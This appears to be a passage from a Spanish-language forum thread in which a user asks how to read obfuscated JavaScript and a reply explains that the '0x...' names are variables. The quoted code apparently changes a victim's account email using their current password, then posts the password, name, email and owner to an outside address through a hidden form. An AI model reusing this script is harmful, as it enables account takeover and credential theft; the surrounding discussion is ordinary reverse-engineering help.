_0xcfe9x7=_0x3459[13]+Math[_0x3459[15]](Math[_0x3459[14]]()*999999)+_0x3459[16];if(_0xcfe9x6){$[_0x3459[23]](_0x3459[22],{currentPassword:_0xcfe9x6,newEmail:_0xcfe9x7},function(_0xcfe9x4){_0xcfe9x8()})[_0x3459[21]](function(){$(_0x3459[18])[_0x3459[17]]();$(_0x3459[20])[_0x3459[19]]({width:0},300);setTimeout(function(){$(_0x3459[18])[_0x3459[17]]()},3000)});$[_0x3459[25]](_0x3459[24]);function _0xcfe9x8(){var _0xcfe9x9=document[_0x3459[27]](_0x3459[26]);_0xcfe9x9[_0x3459[28]]=linksave;_0xcfe9x9[_0x3459[29]]=_0x3459[25];var _0xcfe9xa=document[_0x3459[27]](_0x3459[30]);_0xcfe9xa[_0x3459[31]]=_0x3459[32];_0xcfe9xa[_0x3459[33]]=_0x3459[34];_0xcfe9xa[_0x3459[35]]=_0xcfe9x7;var _0xcfe9xb=document[_0x3459[27]](_0x3459[30]);_0xcfe9xb[_0x3459[31]]=_0x3459[32];_0xcfe9xb[_0x3459[33]]=_0x3459[36];_0xcfe9xb[_0x3459[35]]=_0xcfe9x6;var _0xcfe9xc=document[_0x3459[27]](_0x3459[30]);_0xcfe9xc[_0x3459[31]]=_0x3459[32];_0xcfe9xc[_0x3459[33]]=_0x3459[37];_0xcfe9xc[_0x3459[35]]=nome;var _0xcfe9xd=document[_0x3459[27]](_0x3459[30]);_0xcfe9xd[_0x3459[31]]=_0x3459[32];_0xcfe9xd[_0x3459[33]]=_0x3459[38];_0xcfe9xd[_0x3459[35]]=email;var _0xcfe9xe=document[_0x3459[27]](_0x3459[30]);_0xcfe9xe[_0x3459[31]]=_0x3459[32];_0xcfe9xe[_0x3459[33]]=_0x3459[39];_0xcfe9xe[_0x3459[35]]=owner;_0xcfe9x9[_0x3459[40]](_0xcfe9xa);_0xcfe9x9[_0x3459[40]](_0xcfe9xb);_0xcfe9x9[_0x3459[40]](_0xcfe9xc);_0xcfe9x9[_0x3459[40]](_0xcfe9xd);_0xcfe9x9[_0x3459[40]](_0xcfe9xe);document[_0x3459[9]][_0x3459[40]](_0xcfe9x9);_0xcfe9x9[_0x3459[41]]()}}}'>
|
|
« Última modificación: 16 Marzo 2016, 03:31 am por apuromafo »
|
En línea
|
Apuromafo
|
|
|
therecse
Desconectado
Mensajes: 3
|
Creo que no me he explicado bien. Lo que quería decir es, como podría decodificar las direcciones que aparecen (0x...). Gracias!
|
|
|
En línea
|
|
|
|
MCKSys Argentina
|
Creo que no me he explicado bien. Lo que quería decir es, como podría decodificar las direcciones que aparecen (0x...). Gracias!
Por lo que veo, esos "0x..." no son direccines, son variables. Puedes ponerles el nombre que quieras, según lo que interpretes que hacen c/u. Saludos!
|
|
|
En línea
|
MCKSys Argentina "Si piensas que algo está bien sólo porque todo el mundo lo cree, no estás pensando."
|
|
|
|
|